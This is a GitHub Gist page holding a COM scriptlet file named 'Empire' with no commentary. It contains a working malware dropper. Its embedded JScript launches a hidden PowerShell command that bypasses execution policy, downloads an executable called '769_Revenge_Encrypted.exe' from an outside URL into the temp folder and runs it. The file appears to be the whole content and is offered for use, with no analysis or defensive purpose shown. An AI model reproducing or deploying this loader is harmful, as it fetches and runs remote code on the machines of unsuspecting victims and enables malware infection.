Created
September 2, 2017 00:37
-
-
Save Elm0D/7b0ca57d5a9100bd08e2c704b734081a to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Empire" | |
| progid="Empire" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <!-- USAGE --> | |
| <!-- Credits Of Concept - Casey Smith --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var Wsh = new ActiveXObject("WScript.Shell"); | |
| var ps = "powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command $down = New-Object System.Net.WebClient;$url = 'https://dataseals.org/UploadCenter/up/769_Revenge_Encrypted.exe';$file = $env:temp + '\\7697894.exe';$down.DownloadFile($url,$file);$exec = New-Object -com shell.application;$exec.shellexecute($file);exit;"; | |
| Wsh.Run(ps, 0, false); | |
| ]]> | |
| </script> | |
| </registration> | |
| </scriptlet> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment